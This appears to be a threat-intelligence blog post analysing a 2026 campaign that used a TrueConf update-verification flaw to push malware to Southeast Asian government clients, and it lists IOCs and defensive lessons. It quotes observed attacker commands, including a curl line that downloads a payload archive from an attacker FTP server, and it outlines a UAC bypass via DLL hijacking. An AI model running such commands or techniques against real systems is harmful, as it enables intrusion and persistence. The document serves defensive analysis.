Trusted Software Turns Into Attack Vector: TrueConf Zero-Day Exploited to Breach Southeast Asian Government Networks

CyberDefender 11 mins0

At the start of 2026, cybersecurity researchers uncovered a concerning campaign targeting government organizations across Southeast Asia. What made this case unusual wasn’t just the sophistication of the attackers—it was the method they used. Instead of exploiting an obvious vulnerability, they abused a trusted enterprise tool already installed in the victims’ environments: TrueConf.

This investigation led to the discovery of a previously unknown vulnerability, now tracked as CVE-2026-3502, with a CVSS score of 7.8. The flaw lies in how the TrueConf client handles software updates, allowing attackers to distribute malicious files through a system that users typically trust without question.

TrueConf itself is widely used across the globe. It provides secure video conferencing solutions for enterprises, governments, and critical infrastructure sectors. One of its biggest advantages is its ability to run entirely on-premises, meaning organizations can host everything within their own private networks. This setup is particularly valuable in sensitive environments like military systems, government agencies, and locations where internet access is unreliable or restricted.

Because of this architecture, there is an inherent trust between the central server and all connected clients. That trust, unfortunately, became the main weakness in this case.

TrueConf Update Prompt

How the Vulnerability Works

When a TrueConf client starts, it checks with the internal server to see if a newer version is available. If an update exists, users are prompted to download it from the server. This process appears routine and safe.

However, the problem is that the update mechanism does not properly verify whether the update file is legitimate. There are no strong integrity or authenticity checks in place. This means that if an attacker gains control over the on-premises server, they can replace the update file with a malicious executable.

Once this happens, every connected client becomes a potential target. The system essentially turns into a distribution channel for malware.

Operation “TrueChaos” in the Wild

In the observed attack campaign—dubbed “TrueChaos”—the attackers exploited this exact weakness. They compromised a central TrueConf server operated by a government IT department. This server was responsible for serving multiple agencies across the country.

Instead of targeting each organization individually, the attackers simply replaced the legitimate update package on the server. When users launched their TrueConf clients, they were prompted to install what appeared to be a routine update. In reality, they were installing malware.

The malicious package was cleverly built. It used Inno Setup and successfully mimicked a normal upgrade from version 8.5.1 to 8.5.2. Alongside legitimate files, it dropped:

  • poweriso.exe (benign executable)
  • 7z-x64.dll (malicious DLL)

These were placed in:
C:\ProgramData\PowerISO\

The attackers then used DLL side-loading to execute their payload.

What the Attackers Did Next

Once inside the system, the attackers performed several hands-on activities. These included reconnaissance, persistence, and further payload delivery.

Some of the commands observed:

tasklist > cache
tracert 8.8.8.8 -h 5

They also downloaded additional components:

curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o c:\program files\winrar\winrar.exe x update.7z -p <redacted>

To escalate privileges, they abused a known Windows mechanism involving iscsicpl.exe. By manipulating the user’s PATH environment variable, they forced Windows to load a malicious DLL (iscsiexe.dll), effectively bypassing User Account Control (UAC) without triggering alerts.

The archive they downloaded contained:

  • 7z.exe (legitimate)
  • iscsiexe.dll (malicious loader)
  • rom.dat (encrypted, purpose unclear)

The iscsiexe.dll component was not a full backdoor but acted as a persistence tool, ensuring continued execution of a renamed binary (winexec.exe).

Complete attack Chain

Command-and-Control and Final Payload

Although the final payload was not directly recovered, researchers observed communication with:

  • 47.237.15[.]197
  • 43.134.90[.]60
  • 43.134.52[.]221

These servers were linked to Havoc C2 infrastructure. Based on this evidence, it is highly likely that the attackers deployed a Havoc implant.

Havoc is an open-source post-exploitation framework. While it is designed for legitimate security testing, it is frequently misused in real-world attacks.

Attribution Insights

Researchers believe, with moderate confidence, that this operation is linked to a Chinese-nexus threat actor. This assessment is based on several indicators:

  • Use of DLL sideloading techniques
  • Infrastructure hosted on Alibaba Cloud and Tencent services
  • Targeting aligned with geopolitical interests

Interestingly, the same victim was also targeted with ShadowPad malware around the same time, suggesting either shared access or multiple threat groups operating simultaneously.

Indicators of Compromise (IOCs)

Files:

  • trueconf_windows_update.exe – Malicious update
    22e32bcf113326e366ac480b077067cf
  • iscsiexe.dll – Loader
    9b435ad985b733b64a6d5f39080f4ae0
  • 7z-x64.dll – Havoc implant
    248a4d7d4c48478dcbeade8f7dba80b3

C2 Infrastructure:

  • 43.134.90[.]60
  • 43.134.52[.]221
  • 47.237.15[.]197

Suspicious Artifacts & Behavior:

  • C:\ProgramData\PowerISO\poweriso.exe
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck
  • %AppData%\Roaming\Adobe\update.7z
  • 7za.exe, iscsiexe.dll, rom.dat

Process Chain to Monitor:

  • trueconf.exe → trueconf_windows_update.exe → trueconf_windows_update.tmp

Final Thoughts

This case is a strong reminder that even trusted internal systems can become attack vectors. The attackers didn’t need to breach every endpoint—they only needed to compromise a single trusted server.

It also highlights the importance of monitoring routine processes. What initially looked like normal software behavior turned out to be a large-scale compromise mechanism.

Our Opinion on This Incident

What stands out most in this case is how easily trust can be weaponized in enterprise environments. Organizations often assume that internal systems—especially those not exposed to the internet—are inherently safe. This mindset can lead to gaps in validation, monitoring, and verification processes.

The TrueConf vulnerability shows that internal infrastructure is just as critical to secure as external-facing systems. The lack of proper update validation is not just a technical oversight—it reflects a broader issue in how software trust models are designed. If a system blindly trusts its own update source without verification, it creates a single point of failure that attackers can exploit at scale.

Another important takeaway is the attackers’ efficiency. Instead of noisy, large-scale attacks, they chose a quiet and centralized approach. This allowed them to impact multiple agencies with minimal effort while staying under the radar.

In our view, organizations must rethink how they handle internal updates. Code signing, integrity checks, and behavioral monitoring should be mandatory, not optional. Additionally, security teams should treat internal servers with the same level of scrutiny as internet-facing assets.

Ultimately, this incident is not just about one vulnerability—it’s about a flawed trust assumption that exists in many enterprise systems today.

CyberDefender